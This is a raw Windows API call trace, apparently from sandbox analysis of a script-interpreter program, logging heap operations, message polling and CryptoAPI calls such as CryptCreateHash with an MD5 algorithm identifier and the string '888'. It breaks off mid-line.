[0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.603] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.604] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.604] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.604] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.604] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0267.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.605] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.605] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.605] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.605] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0267.605] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.606] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.606] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.606] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.606] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.606] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.606] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0267.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.607] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.607] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0267.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51dd8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0267.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.607] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0267.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0267.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0267.608] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0267.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0267.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55028 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55078, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.613] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.613] 